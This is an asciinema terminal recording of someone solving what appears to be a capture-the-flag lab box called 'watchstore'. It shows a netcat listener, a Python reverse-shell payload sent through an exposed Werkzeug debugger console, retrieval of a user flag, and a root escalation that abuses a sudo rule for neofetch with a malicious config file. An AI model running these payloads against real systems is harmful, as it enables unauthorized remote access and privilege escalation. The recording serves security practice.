{"version": 2, "width": 116, "height": 53, "timestamp": 1765448647, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.124618, "o", "                                                                                                                    \r\r\u001b]0;david@kali: ~\u0007"]
[0.182865, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mdavid㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~\u001b[0m\u001b[32m]"]
[0.183358, "o", "\r\n"]
[0.183721, "o", "└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m "]
[0.18402, "o", "\u001b[K"]
[0.184397, "o", "\u001b[?1h\u001b="]
[0.186216, "o", "\u001b[?2004h"]
[2.743238, "i", "n"]
[2.747425, "o", "n"]
[2.761526, "o", "\b\u001b[4mn\u001b[24m\b\u001b[4mn\u001b[24m\u001b[38;5;244mmap -sV 10.0.2.37\u001b[39m\u001b[17D"]
[2.852808, "i", "c"]
[2.858092, "o", "\b\u001b[4mn\u001b[39m\u001b[4mc\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[16D\b\b\u001b[24m\u001b[36mn\u001b[24m\u001b[36mc\u001b[39m"]
[2.858842, "o", "\u001b[38;5;244m -lvkp 9797\u001b[39m\u001b[11D"]
[3.744134, "i", "\u001bOC"]
[3.752912, "o", "\u001b[39m \u001b[39m-\u001b[39ml\u001b[39mv\u001b[39mk\u001b[39mp\u001b[39m \u001b[39m9\u001b[39m7\u001b[39m9\u001b[39m7\u001b[10D\u001b[32m-\u001b[32ml\u001b[32mv\u001b[32mk\u001b[32mp\u001b[39m\u001b[5C"]
[3.932837, "i", "\r"]
[3.935492, "o", "\u001b[?1l\u001b>"]
[3.945446, "o", "\u001b[?2004l"]
[3.950126, "o", "\r"]
[3.963502, "o", "\r\n"]
[4.014871, "o", "listening on [any] 9797 ...\r\n"]
[77.805892, "o", "connect to [10.0.2.15] from watchstore.thl [10.0.2.37] 48826"]
[77.807825, "o", "\r\n"]
[77.822311, "o", "bash: no se puede establecer el grupo de proceso de terminal (422): Función ioctl no apropiada para el dispositivo"]
[77.822761, "o", "\r\nbash: no hay control de trabajos en este shell\r\n"]
[77.845513, "o", "relox@thehackerslabs-watchstore:~/watchstore$ "]
[79.039526, "o", "10.0.2.15 - - [11/Dec/2025 11:25:26] \"GET /console?&__debugger__=yes&cmd=import%20socket,subprocess,os;s%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.0.2.15%22,9797));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p%3Dsubprocess.call(%5B%22%2Fbin%2Fbash%22,%22-i%22%5D);&frm=0&s=5nryU8183HXAfPtCerUw HTTP/1.1\" 200 -\r\n"]
[97.77388, "o", "10.0.2.15 - - [11/Dec/2025 11:25:45] \"GET /console?&__debugger__=yes&cmd=import%20socket,subprocess,os;s%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.0.2.15%22,9797));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22,%22-i%22%5D);&frm=0&s=5nryU8183HXAfPtCerUw HTTP/1.1\" 200 -\r\n"]
[97.824528, "o", "10.0.2.15 - - [11/Dec/2025 11:25:45] \"GET /console?&__debugger__=yes&cmd=&frm=0&s=5nryU8183HXAfPtCerUw HTTP/1.1\" 200 -\r\n"]
[135.866217, "i", "l"]
[135.866552, "o", "l"]
[135.959338, "i", "s"]
[135.959448, "o", "s"]
[136.071495, "i", "\r"]
[136.07231, "o", "\r\n"]
[136.075683, "o", "ls\r\n"]
[136.081941, "o", "app.py"]
[136.083617, "o", "\r\n"]
[136.083953, "o", "requirements.txt"]
[136.084267, "o", "\r\nstatic"]
[136.084589, "o", "\r\ntemplates\r\nrelox@thehackerslabs-watchstore:~/watchstore$ "]
[142.189447, "i", "c"]
[142.189938, "o", "c"]
[142.284582, "i", "a"]
[142.28469, "o", "a"]
[142.464903, "i", "t"]
[142.465103, "o", "t"]
[142.577682, "i", " "]
[142.57779, "o", " "]
[143.140024, "i", "\b"]
[143.140132, "o", "^H"]
[143.275313, "i", "\b"]
[143.275786, "o", "^H"]
[143.433206, "i", "\b"]
[143.433479, "o", "^H"]
[143.50006, "i", "\b"]
[143.500297, "o", "^H"]
[144.107887, "i", "\b"]
[144.108244, "o", "^H"]
[144.896758, "i", "\b"]
[144.897024, "o", "^H"]
[145.796485, "i", "\u0001"]
[145.796667, "o", "^A"]
[146.876767, "i", "\u0003"]
[146.876886, "o", "^C"]
[146.879337, "o", "\r\n"]
[146.880392, "o", "                                                                                                                    \r\r"]
[146.884562, "o", "\u001b]0;david@kali: ~\u0007\r\n"]
[146.992147, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mdavid㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~\u001b[0m\u001b[32m]"]
[146.994834, "o", "\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[147.893308, "i", "\u001bOA"]
[147.898251, "o", "nc -lvkp 9797\u001b[13D\u001b[36mn\u001b[36mc\u001b[39m \u001b[32m-\u001b[32ml\u001b[32mv\u001b[32mk\u001b[32mp\u001b[39m\u001b[5C"]
[148.227341, "i", "\r"]
[148.229755, "o", "\u001b[?1l\u001b>"]
[148.23048, "o", "\u001b[?2004l"]
[148.240059, "o", "\r"]
[148.241216, "o", "\r\n"]
[148.260565, "o", "listening on [any] 9797 ..."]
[148.261235, "o", "\r\n"]
[151.153562, "o", "connect to [10.0.2.15] from watchstore.thl [10.0.2.37] 43812\r\n"]
[151.163015, "o", "/bin/sh: 0: can't access tty; job control turned off\r\n$ "]
[153.340086, "i", "l"]
[153.343581, "o", "l"]
[153.472659, "i", "s"]
[153.472767, "o", "s"]
[153.565564, "i", "\r"]
[153.570342, "o", "\r\n"]
[153.575198, "o", "app.py\r\nrequirements.txt\r\nstatic\r\ntemplates\r\n$ "]
[154.778806, "i", "c"]
[154.779329, "o", "c"]
[155.543793, "i", "\b"]
[155.544192, "o", "^H"]
[155.656439, "i", "\b"]
[155.656546, "o", "^H"]
[156.877547, "i", "\u001b[B"]
[156.877699, "o", "^[[B"]
[156.881195, "i", "\u001b[A"]
[156.881607, "o", "^[[A"]
[157.569791, "i", "c"]
[157.5699, "o", "c"]
[157.704903, "i", "a"]
[157.705012, "o", "a"]
[157.884962, "i", "t"]
[157.885072, "o", "t"]
[158.026212, "i", "\r"]
[158.026337, "o", "\r\n"]
[158.028764, "o", "/bin/sh: 2: "]
[158.029678, "o", "c\b\b\u001b[B\u001b[Acat: not found"]
[158.0298, "o", "\r\n"]
[158.029915, "o", "$ "]
[160.22616, "i", "/"]
[160.226633, "o", "/"]
[160.387927, "i", "b"]
[160.388411, "o", "b"]
[160.586422, "i", "i"]
[160.586873, "o", "i"]
[160.698651, "i", "n"]
[160.69876, "o", "n"]
[161.149012, "i", "/"]
[161.14912, "o", "/"]
[161.374012, "i", "b"]
[161.374517, "o", "b"]
[161.532056, "i", "a"]
[161.532177, "o", "a"]
[161.622031, "i", "s"]
[161.623028, "o", "s"]
[161.689401, "i", "h"]
[161.689525, "o", "h"]
[161.982368, "i", "\r"]
[161.983343, "o", "\r\n"]
[162.747875, "i", "l"]
[162.748435, "o", "l"]
[162.904814, "i", "s"]
[162.904929, "o", "s"]
[163.017701, "i", "\r"]
[163.017818, "o", "\r\n"]
[163.030611, "o", "app.py\r\nrequirements.txt\r\nstatic\r\ntemplates\r\n"]
[164.008139, "i", "s"]
[164.008374, "o", "s"]
[164.435577, "i", "\b"]
[164.436125, "o", "^H"]
[165.763957, "i", "\b"]
[165.76443, "o", "^H"]
[166.889673, "i", "\u0003"]
[166.892371, "o", "^C\r\n                                                                                                                    \r\r\u001b]0;david@kali: ~\u0007"]
[166.900136, "o", "\r\n"]
[166.981917, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mdavid㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~\u001b[0m\u001b[32m]"]
[166.982438, "o", "\r\n"]
[166.982752, "o", "└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m "]
[166.983039, "o", "\u001b[K"]
[166.983517, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[184.722461, "i", "\u001bOA"]
[184.723982, "o", "nc -lvkp 9797"]
[184.731988, "o", "\u001b[13D\u001b[36mn\u001b[36mc\u001b[39m \u001b[32m-\u001b[32ml\u001b[32mv\u001b[32mk\u001b[32mp\u001b[39m\u001b[5C"]
[184.943553, "i", "\r"]
[184.945829, "o", "\u001b[?1l\u001b>"]
[184.946685, "o", "\u001b[?2004l"]
[184.950934, "o", "\r"]
[184.951303, "o", "\r\n"]
[184.957619, "o", "listening on [any] 9797 ..."]
[184.957991, "o", "\r\n"]
[186.912348, "o", "connect to [10.0.2.15] from watchstore.thl [10.0.2.37] 48238"]
[186.912604, "o", "\r\n"]
[186.922565, "o", "bash: no se puede establecer el grupo de proceso de terminal (422): Función ioctl no apropiada para el dispositivo"]
[186.922653, "o", "\r\nbash: no hay control de trabajos en este shell"]
[186.922723, "o", "\r\n"]
[186.928349, "o", "relox@thehackerslabs-watchstore:~/watchstore$ "]
[188.770337, "i", "l"]
[188.771231, "o", "l"]
[188.883776, "i", "s"]
[188.883896, "o", "s"]
[189.021173, "i", "\r"]
[189.021287, "o", "\r\n"]
[189.024538, "o", "ls"]
[189.026612, "o", "\r\n"]
[189.032685, "o", "app.py\r\nrequirements.txt\r\nstatic\r\ntemplates\r\n"]
[189.032924, "o", "relox@thehackerslabs-watchstore:~/watchstore$ "]
[190.264516, "i", "\u001b[A"]
[190.265351, "o", "^[[A"]
[190.530869, "i", "\u001b[A"]
[190.530978, "o", "^[[A"]
[190.710011, "i", "\u001b[A"]
[190.710124, "o", "^[[A"]
[190.845854, "i", "\u001b[A"]
[190.845963, "o", "^[[A"]
[191.427238, "i", "\b"]
[191.427395, "o", "^H"]
[191.9281, "i", "\b"]
[191.928476, "o", "^H"]
[191.978887, "i", "\b"]
[191.979405, "o", "^H"]
[192.029133, "i", "\b"]
[192.029469, "o", "^H"]
[192.086557, "i", "\b"]
[192.088501, "o", "^H"]
[192.131776, "i", "\b"]
[192.132154, "o", "^H"]
[192.18383, "i", "\b"]
[192.184301, "o", "^H"]
[192.235144, "i", "\b"]
[192.235256, "o", "^H"]
[192.285599, "i", "\b"]
[192.285716, "o", "^H"]
[192.41728, "i", "\r"]
[192.418502, "o", "\r\n"]
[192.422565, "o", "ls\u0007\u0007\u0007\b \b\b \b\u0007\u0007\u0007\u0007\u0007\u0007\u0007\r\nrelox@thehackerslabs-watchstore:~/watchstore$ "]
[195.613706, "i", "c"]
[195.614175, "o", "c"]
[195.749345, "i", "d"]
[195.749859, "o", "d"]
[195.793965, "i", " "]
[195.794367, "o", " "]
[196.092358, "i", "/"]
[196.092468, "o", "/"]
[196.581634, "i", "h"]
[196.581746, "o", "h"]
[196.762038, "i", "o"]
[196.762145, "o", "o"]
[196.852213, "i", "m"]
[196.852326, "o", "m"]
[196.941986, "i", "e"]
[196.942128, "o", "e"]
[197.234562, "i", "/"]
[197.234773, "o", "/"]
[199.615921, "i", "r"]
[199.616043, "o", "r"]
[199.733765, "i", "e"]
[199.733887, "o", "e"]
[199.801171, "i", "l"]
[199.801296, "o", "l"]
[199.936463, "i", "o"]
[199.936588, "o", "o"]
[200.026227, "i", "x"]
[200.026353, "o", "x"]
[200.206174, "i", "\r"]
[200.207162, "o", "\r\n"]
[200.209611, "o", "cd /home/relox\r\nrelox@thehackerslabs-watchstore:~$ "]
[201.196785, "i", "l"]
[201.196901, "o", "l"]
[201.28891, "i", "s"]
[201.28902, "o", "s"]
[201.444507, "i", "\r"]
[201.44528, "o", "\r\n"]
[201.447047, "o", "ls"]
[201.448309, "o", "\r\n"]
[201.454277, "o", "user.txt"]
[201.455825, "o", "\r\nwatchstore\r\nrelox@thehackerslabs-watchstore:~$ "]
[204.028327, "i", "c"]
[204.028767, "o", "c"]
[204.146182, "i", "a"]
[204.14629, "o", "a"]
[204.25861, "i", "t"]
[204.25872, "o", "t"]
[204.596215, "i", " "]
[204.596322, "o", " "]
[204.888601, "i", "u"]
[204.888709, "o", "u"]
[205.046075, "i", "s"]
[205.046182, "o", "s"]
[205.203949, "i", "e"]
[205.204056, "o", "e"]
[205.339389, "i", "r"]
[205.339497, "o", "r"]
[205.879488, "i", "."]
[205.879603, "o", "."]
[206.036518, "i", "t"]
[206.036629, "o", "t"]
[206.262103, "i", "x"]
[206.26227, "o", "x"]
[206.441845, "i", "t"]
[206.441952, "o", "t"]
[206.599702, "i", "\r"]
[206.600451, "o", "\r\n"]
[206.603393, "o", "cat user.txt"]
[206.603768, "o", "\r\n"]
[206.612107, "o", "43209bbbe006e21f88cf1a53b9e5da8a\r\n"]
[206.613561, "o", "relox@thehackerslabs-watchstore:~$ "]
[206.779342, "i", "\r"]
[206.780077, "o", "\r\n"]
[206.783508, "o", "\r\n"]
[206.783905, "o", "relox@thehackerslabs-watchstore:~$ "]
[211.300167, "i", "s"]
[211.300278, "o", "s"]
[211.439565, "i", "u"]
[211.439815, "o", "u"]
[212.250312, "i", "d"]
[212.251016, "o", "d"]
[212.362302, "i", "o"]
[212.362416, "o", "o"]
[212.543306, "i", " "]
[212.543659, "o", " "]
[212.700266, "i", "-"]
[212.700963, "o", "-"]
[212.926067, "i", "l"]
[212.926274, "o", "l"]
[217.490516, "i", "\r"]
[217.496232, "o", "\r\n"]
[217.496684, "o", "sudo -l\r\n"]
[217.573423, "o", "sudo"]
[217.575462, "o", ": unable to resolve host thehackerslabs-watchstore: Nombre o servicio desconocido"]
[217.575709, "o", "\r\n"]
[217.579201, "o", "Matching Defaults entries for relox on thehackerslabs-watchstore:"]
[217.58076, "o", "\r\n    env_reset, mail_badpass,\r\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,\r\n    env_keep+=XDG_CONFIG_HOME, use_pty\r\n\r\nUser relox may run the following commands on thehackerslabs-watchstore:\r\n    (root) NOPASSWD: /usr/bin/neofetch"]
[217.58084, "o", "\r\n"]
[217.580918, "o", "relox@thehackerslabs-watchstore:~$ "]
[219.385789, "i", "s"]
[219.385902, "o", "s"]
[219.478686, "i", "u"]
[219.479203, "o", "u"]
[219.611514, "i", "d"]
[219.611623, "o", "d"]
[219.725223, "i", "o"]
[219.725331, "o", "o"]
[219.903845, "i", " "]
[219.903954, "o", " "]
[220.118498, "i", "/"]
[220.118666, "o", "/"]
[220.601508, "i", "u"]
[220.601617, "o", "u"]
[220.714233, "i", "s"]
[220.714436, "o", "s"]
[221.727511, "i", "r"]
[221.727986, "o", "r"]
[222.133131, "i", "/"]
[222.133723, "o", "/"]
[222.357588, "i", "b"]
[222.358062, "o", "b"]
[222.538041, "i", "i"]
[222.538149, "o", "i"]
[222.650188, "i", "n"]
[222.650301, "o", "n"]
[222.897719, "i", "/"]
[222.897826, "o", "/"]
[223.130953, "i", "n"]
[223.131072, "o", "n"]
[223.303525, "i", "e"]
[223.303635, "o", "e"]
[223.437732, "i", "o"]
[223.437929, "o", "o"]
[223.595699, "i", "f"]
[223.595892, "o", "f"]
[224.13693, "i", "e"]
[224.137891, "o", "e"]
[224.315977, "i", "t"]
[224.31617, "o", "t"]
[224.519917, "i", "c"]
[224.520057, "o", "c"]
[224.632075, "i", "h"]
[224.632219, "o", "h"]
[225.284664, "i", "\r"]
[225.285413, "o", "\r\n"]
[225.288563, "o", "sudo /usr/bin/neofetch\r\n"]
[225.33714, "o", "sudo"]
[225.33761, "o", ": unable to resolve host thehackerslabs-watchstore: Nombre o servicio desconocido\r\n"]
[225.485223, "o", "\u001b[?25l\u001b[?7l"]
[225.491913, "o", "\u001b[37m\u001b[0m\u001b[1m       _,met$$$$$gg.\r\n"]
[225.495014, "o", "    ,g$$$$$$$$$$$$$$$P.\r\n  ,g$$P\"     \"\"\"Y$$.\".\r\n ,$$P'              `$$$.\r\n',$$P       ,ggs.     `$$b:\r\n`d$$'     ,$P\"'   \u001b[0m\u001b[31m\u001b[1m.\u001b[37m\u001b[0m\u001b[1m    $$$\r\n $$P      d$'     \u001b[0m\u001b[31m\u001b[1m,\u001b[37m\u001b[0m\u001b[1m    $$P\r\n $$:      $$.   \u001b[0m\u001b[31m\u001b[1m-\u001b[37m\u001b[0m\u001b[1m    ,d$$'\r\n $$;      Y$b._   _,d$P'\r\n Y$$.    \u001b[0m\u001b[31m\u001b[1m`.\u001b[37m\u001b[0m\u001b[1m`\"Y$$$$P\"'\r\n\u001b[37m\u001b[0m\u001b[1m `$$b      \u001b[0m\u001b[31m\u001b[1m\"-.__\r\n\u001b[37m\u001b[0m\u001b[1m  `Y$$\r\n   `Y$$.\r\n     `$$b.\r\n       `Y$$b.\r\n          `\"Y$b._\r\n              `\"\"\"\u001b[0m\r\n\u001b[17A\u001b[9999999D"]
[225.500879, "o", "\u001b[30C\u001b[0m\u001b[1m\u001b[31m\u001b[1mroot\u001b[0m@\u001b[31m\u001b[1mthehackerslabs-watchstore\u001b[0m "]
[225.503119, "o", "\r\n"]
[225.503483, "o", "\u001b[30C\u001b[0m------------------------------\u001b[0m \r\n"]
[225.508858, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mOS\u001b[0m\u001b[0m:\u001b[0m Debian GNU/Linux 12 (bookworm) x86_64\u001b[0m \r\n"]
[225.5162, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mHost\u001b[0m\u001b[0m:\u001b[0m VirtualBox 1.2\u001b[0m \r\n"]
[225.523124, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mKernel\u001b[0m\u001b[0m:\u001b[0m 6.1.0-35-amd64\u001b[0m \r\n"]
[225.530219, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mUptime\u001b[0m\u001b[0m:\u001b[0m 15 mins\u001b[0m "]
[225.533194, "o", "\r\n"]
[225.567895, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mPackages\u001b[0m\u001b[0m:\u001b[0m 506 (dpkg)\u001b[0m "]
[225.56846, "o", "\r\n"]
[225.574962, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mShell\u001b[0m\u001b[0m:\u001b[0m bash 5.2.15\u001b[0m "]
[225.575283, "o", "\r\n"]
[225.583328, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mResolution\u001b[0m\u001b[0m:\u001b[0m 1280x800\u001b[0m "]
[225.583683, "o", "\r\n"]
[225.656849, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mCPU\u001b[0m\u001b[0m:\u001b[0m Intel i7-9750H (1) @ 2.592GHz\u001b[0m \r\n"]
[225.730715, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mGPU\u001b[0m\u001b[0m:\u001b[0m 00:02.0 VMware SVGA II Adapter\u001b[0m "]
[225.731098, "o", "\r\n"]
[225.739643, "o", "\u001b[30C\u001b[0m\u001b[31m\u001b[1mMemory\u001b[0m\u001b[0m:\u001b[0m 131MiB / 1967MiB\u001b[0m \r\n"]
[225.741519, "o", "\r\n"]
[225.744282, "o", "\u001b[30C\u001b[30m\u001b[40m   \u001b[31m\u001b[41m   \u001b[32m\u001b[42m   \u001b[33m\u001b[43m   \u001b[34m\u001b[44m   \u001b[35m\u001b[45m   \u001b[36m\u001b[46m   \u001b[37m\u001b[47m   \u001b[m\r\n"]
[225.745702, "o", "\u001b[30C\u001b[38;5;8m\u001b[48;5;8m   \u001b[38;5;9m\u001b[48;5;9m   \u001b[38;5;10m\u001b[48;5;10m   \u001b[38;5;11m\u001b[48;5;11m   \u001b[38;5;12m\u001b[48;5;12m   \u001b[38;5;13m\u001b[48;5;13m   \u001b[38;5;14m\u001b[48;5;14m   \u001b[38;5;15m\u001b[48;5;15m   \u001b[m\r\n\r\n\r\n\r\n"]
[225.748903, "o", "\u001b[?25h\u001b[?7h"]
[225.752087, "o", "relox@thehackerslabs-watchstore:~$ "]
[227.06326, "i", "w"]
[227.063371, "o", "w"]
[227.199897, "i", "h"]
[227.200306, "o", "h"]
[227.355253, "i", "o"]
[227.355367, "o", "o"]
[227.489916, "i", "a"]
[227.490026, "o", "a"]
[227.605037, "i", "m"]
[227.605152, "o", "m"]
[227.737648, "i", "i"]
[227.73776, "o", "i"]
[227.985225, "i", "\r"]
[227.985337, "o", "\r\n"]
[227.988233, "o", "whoami"]
[227.990272, "o", "\r\n"]
[227.999437, "o", "relox\r\n"]
[228.001136, "o", "relox@thehackerslabs-watchstore:~$ "]
[229.448674, "i", "s"]
[229.448785, "o", "s"]
[229.606439, "i", "u"]
[229.606548, "o", "u"]
[229.764246, "i", "d"]
[229.764355, "o", "d"]
[229.899564, "i", "o"]
[229.899671, "o", "o"]
[230.213876, "i", "\b"]
[230.213984, "o", "^H"]
[230.394109, "i", "\b"]
[230.394219, "o", "^H"]
[230.529267, "i", " "]
[230.529473, "o", " "]
[231.091748, "i", "\b"]
[231.091855, "o", "^H"]
[231.812243, "i", "\r"]
[231.812996, "o", "\r\n"]
[231.816433, "o", "sudo"]
[231.81664, "o", "\b \b\b \b \b \b\r\n"]
[231.834612, "o", "Contraseña: "]
[232.239925, "i", "s"]
[232.240205, "o", "s"]
[232.444806, "i", "u"]
[232.445271, "o", "u"]
[232.872318, "i", "\b"]
[232.87258, "o", "^H"]
[232.983279, "i", "\b"]
[232.983387, "o", "^H"]
[233.163146, "i", "\b"]
[233.164726, "o", "^H"]
[233.613226, "i", "\r"]
[233.613391, "o", "\r\n"]
[236.608277, "o", "su: Fallo de autenticación"]
[236.60837, "o", "\r\n"]
[236.608451, "o", "relox@thehackerslabs-watchstore:~$ "]
[237.164638, "i", "s"]
[237.16479, "o", "s"]
[237.215509, "i", "u"]
[237.215617, "o", "u"]
[237.530558, "i", " "]
[237.530663, "o", " "]
[237.623369, "i", "r"]
[237.623477, "o", "r"]
[237.734663, "i", "o"]
[237.73477, "o", "o"]
[237.868052, "i", "o"]
[237.868159, "o", "o"]
[237.937932, "i", "t"]
[237.938097, "o", "t"]
[238.115606, "i", "\r"]
[238.116502, "o", "\r\n"]
[238.122241, "o", "su root\r\n"]
[238.127644, "o", "Contraseña: "]
[240.524176, "i", "\u0003"]
[240.524306, "o", "^C"]
[240.525684, "o", "\r\n"]
[240.526143, "o", "                                                                                                                    \r\r"]
[240.527208, "o", "\u001b]0;david@kali: ~\u0007"]
[240.527536, "o", "\r\n"]
[240.561394, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mdavid㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~\u001b[0m\u001b[32m]"]
[240.561905, "o", "\r\n"]
[240.562232, "o", "└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[240.562499, "o", "\u001b[?2004h"]
[241.271585, "i", "\u001bOA"]
[241.272592, "o", "nc -lvkp 9797"]
[241.277116, "o", "\u001b[13D\u001b[36mn\u001b[36mc\u001b[39m \u001b[32m-\u001b[32ml\u001b[32mv\u001b[32mk\u001b[32mp\u001b[39m\u001b[5C"]
[241.698876, "i", "\r"]
[241.701172, "o", "\u001b[?1l\u001b>"]
[241.703422, "o", "\u001b[?2004l"]
[241.709888, "o", "\r"]
[241.710272, "o", "\r\n"]
[241.738734, "o", "listening on [any] 9797 ..."]
[241.739058, "o", "\r\n"]
[249.440298, "o", "connect to [10.0.2.15] from watchstore.thl [10.0.2.37] 52332\r\n"]
[249.448043, "o", "bash: no se puede establecer el grupo de proceso de terminal (422): Función ioctl no apropiada para el dispositivo\r\nbash: no hay control de trabajos en este shell\r\n"]
[249.456268, "o", "relox@thehackerslabs-watchstore:~/watchstore$ "]
[251.555703, "i", "s"]
[251.555904, "o", "s"]
[251.80694, "i", "u"]
[251.807054, "o", "u"]
[252.051356, "i", "d"]
[252.05156, "o", "d"]
[252.320023, "i", "o"]
[252.320532, "o", "o"]
[254.177913, "i", "\b"]
[254.178028, "o", "^H"]
[254.278854, "i", "\b"]
[254.27897, "o", "^H"]
[254.347939, "i", "\b"]
[254.348139, "o", "^H"]
[254.908994, "i", "\b"]
[254.909493, "o", "^H"]
[255.409732, "i", "\b"]
[255.410456, "o", "^H"]
[255.460128, "i", "\b"]
[255.46049, "o", "^H"]
[255.511452, "i", "\b"]
[255.51187, "o", "^H"]
[255.564538, "i", "\b"]
[255.564929, "o", "^H"]
[255.615012, "i", "\b"]
[255.615355, "o", "^H"]
[255.665912, "i", "\b"]
[255.66602, "o", "^H"]
[255.716907, "i", "\b"]
[255.717018, "o", "^H"]
[255.768641, "i", "\b"]
[255.768748, "o", "^H"]
[256.779368, "i", "s"]
[256.779587, "o", "s"]
[257.025585, "i", "u"]
[257.025729, "o", "u"]
[257.093171, "i", "d"]
[257.093314, "o", "d"]
[257.250298, "i", "o"]
[257.250408, "o", "o"]
[257.362945, "i", " "]
[257.363056, "o", " "]
[257.520127, "i", "-"]
[257.520242, "o", "-"]
[257.723216, "i", "l"]
[257.723329, "o", "l"]
[257.992978, "i", "\r"]
[257.993089, "o", "\r\n"]
[257.998599, "o", "sudo\b \b\b \b\b \b\b \b\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007sudo -l"]
[257.998947, "o", "\r\n"]
[258.047525, "o", "sudo: unable to resolve host thehackerslabs-watchstore: Nombre o servicio desconocido\r\n"]
[258.051748, "o", "Matching Defaults entries for relox on thehackerslabs-watchstore:\r\n    env_reset, mail_badpass,\r\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin,\r\n    env_keep+=XDG_CONFIG_HOME, use_pty\r\n\r\nUser relox may run the following commands on thehackerslabs-watchstore:\r\n    (root) NOPASSWD: /usr/bin/neofetch\r\n"]
[258.05446, "o", "relox@thehackerslabs-watchstore:~/watchstore$ "]
[259.793952, "i", "s"]
[259.794324, "o", "s"]
[259.9737, "i", "u"]
[259.973808, "o", "u"]
[260.066152, "i", "d"]
[260.066259, "o", "d"]
[260.266706, "i", "o"]
[260.266873, "o", "o"]
[260.424148, "i", " "]
[260.424297, "o", " "]
[261.123763, "i", "/"]
[261.124019, "o", "/"]
[261.730202, "i", "u"]
[261.730309, "o", "u"]
[262.227144, "i", "s"]
[262.227717, "o", "s"]
[262.540213, "i", "r"]
[262.540319, "o", "r"]
[275.506765, "i", "\b"]
[275.506937, "o", "^H"]
[276.45259, "i", "l"]
[276.452699, "o", "l"]
[276.564998, "i", "s"]
[276.565296, "o", "s"]
[276.702957, "i", "\r"]
[276.704041, "o", "\r\n"]
[276.707001, "o", "sudo /usr\b \bls"]
[276.707312, "o", "\r\n"]
[276.752556, "o", "sudo: unable to resolve host thehackerslabs-watchstore: Nombre o servicio desconocido"]
[276.7529, "o", "\r\n"]
[276.759324, "o", "sudo"]
[276.760935, "o", ": a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper\r\n"]
[276.764085, "o", "sudo: a password is required"]
[276.764418, "o", "\r\n"]
[276.766801, "o", "relox@thehackerslabs-watchstore:~/watchstore$ "]
[278.845775, "i", "TF=$(mktemp)\recho 'exec /bin/sh' >$TF\rsudo neofetch --config $TF"]
[278.847644, "o", "TF=$(mktemp)\r\necho 'exec /bin/sh' >$TF\r\nsudo neofetch --config $TF"]
[278.852037, "o", "TF=$(mktemp)"]
[278.852517, "o", "\r\n"]
[278.861619, "o", "relox@thehackerslabs-watchstore:~/watchstore$ "]
[278.904463, "o", "echo 'exec /bin/sh' >$TF"]
[278.904648, "o", "\r\nrelox@thehackerslabs-watchstore:~/watchstore$ "]
[279.779458, "i", "\r"]
[279.779571, "o", "\r\n"]
[279.783551, "o", "sudo neofetch --config $TF"]
[279.78367, "o", "\r\n"]
[279.835402, "o", "sudo: unable to resolve host thehackerslabs-watchstore: Nombre o servicio desconocido\r\n"]
[280.887367, "i", "s"]
[280.888003, "o", "s"]
[281.090217, "i", "u"]
[281.090455, "o", "u"]
[281.38391, "i", "\b"]
[281.384282, "o", "^H"]
[281.495176, "i", "\b"]
[281.495545, "o", "^H"]
[281.630339, "i", "w"]
[281.630447, "o", "w"]
[282.327676, "i", "h"]
[282.327963, "o", "h"]
[282.553202, "i", "o"]
[282.553842, "o", "o"]
[282.665475, "i", "a"]
[282.665937, "o", "a"]
[282.778096, "i", "m"]
[282.778203, "o", "m"]
[282.891365, "i", "i"]
[282.891507, "o", "i"]
[283.071348, "i", "\r"]
[283.071467, "o", "\r\n"]
[283.074928, "o", "/bin/sh: 1: su\b\bwhoami: not found\r\n"]
[283.81344, "i", "w"]
[283.813548, "o", "w"]
[283.948516, "i", "h"]
[283.948626, "o", "h"]
[284.128663, "i", "o"]
[284.12877, "o", "o"]
[284.263767, "i", "a"]
[284.264379, "o", "a"]
[284.353856, "i", "m"]
[284.354098, "o", "m"]
[284.46693, "i", "i"]
